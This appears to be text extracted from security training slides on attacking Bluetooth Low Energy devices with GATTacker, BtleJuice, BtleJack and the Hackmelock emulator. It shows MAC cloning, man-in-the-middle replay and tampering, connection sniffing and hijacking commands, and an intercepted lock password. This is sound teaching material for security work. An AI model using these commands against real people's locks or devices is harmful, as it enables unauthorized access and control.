Manufacturer: Cambridge Silicon Radio (10)
Device address: 00:1A:7D:DA:72:00
New BD address: 00:1A:7D:DA:72:01 Now re-plug the interface
to reset it
Address changed - Reset device now
root@kali:~# hciconfig hci0 up
root@kali:~# bdaddr
Manufacturer: Cambridge Silicon Radio (10) Check the MAC address is
Device address: 00:1A:7D:DA:72:01 changed
Simple helper script to change MAC automatically
For the helper script (changing MAC automatically)

Uncomment in config.env
# "peripheral" device emulator

BLENO_HCI_DEVICE_ID=0

ID of your advertising
adapter (0 for hci0)
Start device – mac_adv (wrapper to advertise.js)

root@kali:~node_modules/gattacker# ./mac_adv -a
devices/f4b85ec06ea5_Padlock-.adv.json -s devices/f4b85ec06ea5.srv.json
Advertise with cloned MAC address
Manufacturer: Cambridge Silicon Radio (10)
Helper bash script to
Device address: B0:EC:8F:00:91:0D
change MAC addr
New BD address: F4:B8:5E:C0:6E:A5

Address changed - Reset device now

Re-plug the interface and hit enter Re-plug USB adapter
Cleartext password:
12345678
BTLEJUICE
Introducing BtleJuice by Damien Cauquil @virtualabs

https://github.com/DigitalSecurity/btlejuice
https://speakerdeck.com/virtualabs/btlejuice-the-bluetooth-smart-mitm-framework

https://en.wikipedia.org/wiki/Multiple_discovery

The concept of multiple discovery (also known as simultaneous invention) is the

hypothesis that most scientific discoveries and inventions are made independently and
more or less simultaneously by multiple scientists and inventors.
Install in Kali (already in your VM)

# apt-get install nodejs npm

# npm install --unsafe-perm -g btlejuice
BtleJuice – run „proxy” on Box 1

root@kali:~# hciconfig hci0 up

root@kali:~# btlejuice-proxy

[i] Using interface hci0

[info] Server listening on port 8000

BtleJuice interface – box 2

root@kali:~# btlejuice -u <your_proxy_ip> -w

http://localhost:8080

Start scanning for

devices
Properly set-up
Now connect to emulated device and try to write
Btlejuice - replay

Right-click on any row

and select „Replay”
Btlejuice - replay

You can change the

value here
Btlejuice - hook

Right-click on a row
and select „Set hook”
Btlejuice - hook

Now try to read or write to given characteristic – popup:

You can change the value here

BtleJuice vs GATTacker

- Depends on stock noble/bleno – several pros vs cons

- Automatic MAC address spoofing currently unstable

- Has much better UI (web vs console), simple

replay/tamper
- Just try the other tool if something does not work for you
How do we hack BLE?
Passive sniffing Android HCI dump Active MITM
Using simple hw is unreliable, Catches all the packets (of our Catches all the packets (+ allows
easy to loose packets. transmission) for active modification)

Difficult to understand Difficult to understand Easy to understand transmission

transmission in Wireshark. transmission in Wireshark (GATTacker console, BtleJuice web)
Limited scripting – decode pcap, Limited scripting – decode pcap,
replay packets. replay packets. Hooks, possible to proxy, API for
live packets tampering...
Can be helpful to diagnose what Does not cover link-layer. Only data
is happening on link-layer (e.g. exchanged between Android and Does not cover link-layer. Not that
Bluetooth encryption) BT adapter we actually need it ;)

Does not require access to device Requires access to smartphone Does not require access to device
nor smartphone nor smartphone
Even if the connection is
Limited possibilities to decode encrypted, we have the packets in Will not work (out of box) against
encrypted connections (intercept cleartext (de-/encrypted by link-layer Bluetooth encryption
pairing + CrackLE). adapter)
THE SEX TOY AGAIN
BTW the sex toy intercepted in GATTacker

# node scan 38d269e523b1

# ./mac_adv -a devices/38d269e523b1_REALOV-
VIBE.adv.json
BTW, the sex toy intercepted in GATTacker
Characteristics, write
Vendor response

https://www.lovense.com/sex-toy-blog/lovense-hack

Would you call it „hack”?

 Or does it?
https://www.lovense.com/sex-toy-blog/lovense-hack
Proximity = limited risk, valid point

https://www.lovense.com/sex-toy-blog/lovense-hack
https://www.lovense.com/sex-toy-blog/lovense-hack
 BtleJack, Defcon 26

https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Damien%20Cauquil%20-%20Updated/DEFCON-26-Damien-
Cauquil-Secure-Your-BLE-Devices-Updated.pdf
 Hijacking Lovense sex toy

https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Damien%20Cauquil%20-%20Updated/DEFCON-26-Damien-
Cauquil-Secure-Your-BLE-Devices-Demo-Videos/demo-hush.mp4
BTLEJACK
BtleJack

Presented at Defcon 26 by Damien Cauquil (@virtualabs)

Slides:
https://media.defcon.org/DEF%20CON%2026/DEF%20CON%2026%20presentations/Da
mien%20Cauquil%20-%20Updated/DEFCON-26-Damien-Cauquil-Secure-Your-BLE-
Devices-Updated.pdf

Source:
https://github.com/virtualabs/btlejack
BtleJack

Designed to work on BBC micro:bit.

It is $15 educational device, easy to
develop (micropython) and flash
(send file to USB storage).
Built upon nRF51822 –> we can use
BtleJack fw on other nRF51822 hw.
https://microbit.org/
BtleJack on other nRF51822

BLE400 has already built-in USB adapter

The pinout is different than BBC micro:bit

-> a small patch to the firmware:

uBit.serial.redirect(P0_9, P0_11);
Flash Btlejack to our board using openocd

> halt
> nrf51 mass_erase
> reset
> halt
> flash write_image nrf/btlejack-firmware-ble400.hex
(...)
> reset
For the new Btlejack version

Btlejack requires client and firmware versions matching.

After updating the client, firmware should also be updated.
Current BLE400 hex precompiled by Damien on Github:
https://github.com/virtualabs/btlejack-
firmware/blob/master/dist/btlejack-firmware-ble400.hex
Install BtleJack client (already in your VM)

Kali Linux:
# pip3 install btlejack
Btlejack – catch and follow connection requests

root@kali:~# btlejack -c any -d /dev/ttyUSB0

BtleJack version 1.1

[i] Detected sniffers:

Works basically like an
> Sniffer #0: version 1.2 nRF sniffer
Btlejack – catch any connreq (adv channels)
Filter specific device MAC

root@kali:~# btlejack -c d1:7c:65:9a:9a:a5 -d /dev/ttyUSB0

BtleJack version 1.2

[i] Detected sniffers:

> Sniffer #0: version 1.2
Save output to pcap (Wireshark)

root@kali:~# btlejack -c any -d /dev/ttyUSB0 –x nordic –o out.pcap

pcap format (nordic, ll_phdr, pcap)

Multiple Btlejack devices

root@kali:~# btlejack -c d1:7c:65:9a:9a:a5 -d /dev/ttyUSB0

-d /dev/ttyUSB1 –d /dev/ttyUSB2

Devices will work in parallel, better

chances to catch packets
Catch existing connections

root@kali:~# btlejack -s -d /dev/ttyUSB0

BtleJack version 1.1

[i] Enumerating existing connections ...

[ - 55 dBm] 0x1816aa34 | pkts: 1
[ - 55 dBm] 0x1816aa34 | pkts: 2
[ - 55 dBm] 0x1816aa34 | pkts: 3

After connection is established, it is determined

in RF by „access address” (connection id)
Follow specific connection

btlejack –f <access address>

Example data captured (LED on)
Read value of 0x27

Value 00

Write 01 to 0x27

Read again value of 0x27

Value 01
Hijack the connection

root@kali:~# btlejack -f 0x9edbd4ca -t -d /dev/ttyUSB0

(...)
[i] Synchronized, hijacking in progress ...
[i] Connection successfully hijacked, it is all yours \o/
btlejack> write <value handle> <data format> <data>
write 0x25 hex 01

Turn on the LED

SEE ALSO
Hackmelock
Open-source

https://smartlockpicking.com/hackmelock

Sources:
https://github.com/smartlockpicking/hackmelock-device/

https://github.com/smartlockpicking/hackmelock-android/
Requirements – emulator script

Hackmelock is written using node.js bleno library (and additional libs: colors,
async). It is already installed on your Raspberry.

Installing on other systems: npm install hackmelock.

It was tested on Linux (Kali, Raspberry Pi, ...), should run also on Mac,
probably Windows.

Bleno installation and requirements:

https://github.com/sandeepmistry/bleno
Install (already in your Kali)

Emulated device:
$ npm install hackmelock

Android app:
https://play.google.com/store/apps/details?id=com.smartlockpicking.hackmelock
Run emulator

$ cd node_modules/hackmelock/
$ node peripheral

advertising...
In configuration mode, it advertises iBeacon

Major/Minor=1
Pairing
After pairing emulator stores config.txt

$ node peripheral.js
advertising...
Client 4a:00:e9:88:16:63 connected!
Status read request:
Initialization mode!
initializing... 0 531ce397
initializing... 1 325d18fe1481151073dc4d4a
initializing... 2 7ca71db0196bda712131dc57
(...)
Config loaded - iBeaconMajor: 21276 iBeaconMinor: 58263
Sharing access
See also

Hacking bluetooth smart locks (my Brucon workshop slides):

https://smartlockpicking.com/slides/BruCON0x09_2017_Hacking_Bluetooth_
Smart_locks.pdf
BLE CTF (esp32)
http://www.hackgnar.com/2018/06/learning-bluetooth-hackery-with-ble-
ctf.html
BLEMystique (esp32)
https://github.com/pentesteracademy/blemystique
 Want to learn more?

Trainings
Tutorials
Events
...

https://www.smartlockpicking.com